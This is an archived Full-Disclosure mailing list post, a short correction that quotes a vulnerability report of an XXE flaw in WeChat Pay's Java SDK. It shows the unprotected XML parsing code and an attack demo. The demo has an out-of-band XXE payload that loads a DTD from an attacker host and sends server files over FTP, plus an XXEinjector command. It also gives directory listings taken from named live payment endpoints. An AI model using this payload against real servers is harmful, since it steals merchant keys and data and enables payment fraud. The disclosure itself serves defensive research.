lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 2 Jul 2018 16:31:26 -0700
From: Rose Jackcode <1024rosecode@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] XXE in WeChat Pay Sdk ( WeChat leave a backdoor on
	merchant websites)

sorry,there some to fix:

    it lost  "?" character。

shoule be fix :

    https://pay.weixin.qq.com/wiki/doc/api/app/app.php?chapter=11_1

2018-07-01 8:57 GMT-07:00 Rose Jackcode <1024rosecode@...il.com>:

> Hi List,
>
>
> [Title]
>
>
> XXE  in  WeChat Pay  Sdk ( WeChat leave a backdoor on merchant websites)
>
>
> ------------------------------------------
>
>
> [Background]
>
> “Mobile payments surge to $9 trillion a year, changing how people shop,
> borrow—even panhandle”,  as WSJ.com once reported.  As a payment security
> researcher, I occasionally found a perilous problem about WeChat Pay
> which I think may be esay to make use of.  Therefore, I hope to be able
> to contact with WeChat Pay quickly.
>
>
> ------------------------------------------
>
>
> [Description]
>
>     When using WeChat payment merchants need providing a notification URL
> to accept asynchronous payment results. Unfortunately, WeChat
> unintentionally provides a xxe vulnerability in the JAVA version SDK which
> handles this result. The attacker can build malicious payload towards the
> notification URL to steal any information of the merchant server as he or
> she want. Once the attacker get the crucial security key (md5-key and
> merchant-Id etc.) of the merchant , he can even buy anything without
> paying by just sending forged info to deceive the merchants.
>
> WeChat can fix it by updating the SDK quite easily, however the bad side
>
> is while exposing merchants may need a long time to go for the sake of time
> , cost and skills needed.
>
>
> ------------------------------------------
>
>
> [Authors]
>
>
>  1024fresher
>
>  ------------------------------------------
>
>
> [Detail]
>
>
>    The SDK  in this page:  https://pay.weixin.qq.com/
> wiki/doc/api/jsapi.php chapter=11_1
>
>    Just in java vision:  https://pay.weixin.qq.com/wiki/doc/api/download/
> WxPayAPI_JAVA_v3.zip
>
>     or  https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o
> 6ud/view( Backup )
>
>
>
>
>
>    README.md in  WxPayApi_JAVA_v3.zip,it show more details:
>
>
>
>    notify code example:
>
>     [
>
>         String notifyData = "....";
>
>         MyConfig config = new MyConfig();
>
>         WXPay wxpay = new WXPay(config);
>
> //conver to map
>
>         Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
>
>
>         if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {
>
> //do business logic
>
>         }
>
>         else {
>
>          }
>
>
>
>      ]
>
>     WXPayUtil source code
>
>    [
>
>
>   public static Map<String, String> xmlToMap(String strXML) throws
> Exception {
>
>     try {
>
>             Map<String, String> data = new HashMap<String, String>();
>
>             /*** not disabled xxe *****/
>
>             //start parse
>
>
>             DocumentBuilderFactory documentBuilderFactory =
> DocumentBuilderFactory.newInstance();
>
>             DocumentBuilder documentBuilder = documentBuilderFactory.
> newDocumentBuilder();
>
>             InputStream stream = new ByteArrayInputStream(strXML.getBytes(
> "UTF-8"));
>
>             org.w3c.dom.Document doc = documentBuilder.parse(stream);
>
>
>
>            //end parse
>
>
>
>
>
>             doc.getDocumentElement().normalize();
>
>             NodeList nodeList = doc.getDocumentElement().getChildNodes();
>
>             for (int idx = 0; idx < nodeList.getLength(); ++idx) {
>
>                 Node node = nodeList.item(idx);
>
>                 if (node.getNodeType() == Node.ELEMENT_NODE) {
>
>                     org.w3c.dom.Element element = (org.w3c.dom.Element)
> node;
>
>                     data.put(element.getNodeName(), element.getTextContent
> ());
>
>                 }
>
>             }
>
>             try {
>
>                 stream.close();
>
>             } catch (Exception ex) {
>
>                 // do nothing
>
>             }
>
>             return data;
>
>         } catch (Exception ex) {
>
>             WXPayUtil.getLogger().warn("Invalid XML, can not convert to
> map. Error message: {}. XML content: {}", ex.getMessage(), strXML);
>
>             throw ex;
>
>         }
>
>     }
>
>
>
> ]
>
>
>
>
>
>
>
>
> ------------------------------------------
>
>
> [Attack demo]
>
>
>
> Post merchant notification url with  payload:
>
>
> <?xml version="1.0" encoding="utf-8"?>
>
> <!DOCTYPE root [
>
>   <!ENTITY % attack SYSTEM "file:///etc/">
>
>   <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">
>
>   %xxe;
>
> ]>
>
>
> data.dtd:
>
>
> <!ENTITY % shell "<!ENTITY &#x25; upload SYSTEM 'ftp://attack:33/%attack;
> '>">
>
> %shell;
>
> %upload;
>
>
>
> or use  XXEinjector tool  【https://github.com/enjoiz/XXEinjector】
>
>
> ruby XXEinjector.rb --host=attacker --path=/etc   --file=req.txt --ssl
>
>
> req.txt :
>
> POST merchant_notification_url HTTP/1.1
>
> Host:  merchant_notification_url_host
>
> User-Agent: curl/7.43.0
>
> Accept: */*
>
> Content-Length: 57
>
> Content-Type: application/x-www-form-urlencoded
>
>
> XXEINJECT
>
>
>
>
>
> In order to prove this, I got 2 chinese famous company:
>
>    a、momo: Well-known chat tools like WeChat
>
>    b、vivo :China's famous mobile phone,that also famous in my country
>
>
>
> Example  momo :
>
>   attack:
>
>      notify url:    https://pay.immomo.com/weixin/notify
>
>               cmd:  /home/
>
>
>
>       result:
>
>
>
>       ***
>
>       logs
>
>       zhang.jiax**
>
>       zhang.shaol**
>
>       zhang.xia**
>
>       ****
>
>
>     attack:
>
>      notify url:    https://pay.immomo.com/weixin/notify
>
>               cmd:  /home/logs
>
>
>
>       result:
>
>       ***
>
>        moa-service
>
>        momotrace
>
>       ****
>
>
> Example  vivo :
>
>   attack:
>
>      notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo
>
>               cmd: /home/
>
>
>
>       result:
>
>          tomcat
>
>
>   attack:
>
>      notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo
>
>               cmd: /home/tomcat
>
>      result:
>
>         .bash_logout
>
> .bash_profile
>
> .bashrc
>
> logs
>
>
>  attack:
>
>      notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo
>
>               cmd: /home/tomcat/logs
>
>      result:
>
>            ****
>
>            tomcat-2018-06-28.log
>
>   tomcat-2018-06-29.log
>
>   tomcat-2018-06-30.log
>
>            *****
>
>
>
>
>
>
>
>
> ------------------------------------------
>
>
> [Reference]
>
>
> https://www.youtube.com/watch?v=BZOg_NgvP18
>
> https://www.blackhat.com/docs/us-15/materials/us-15-Wang-
> FileCry-The-New-Age-Of-XXE-java-wp.pdf
>
>
>
> Regards,
>
>
> 1024rosecode
>
>
>
>

Download attachment "image.png" of type "image/png" (71426 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ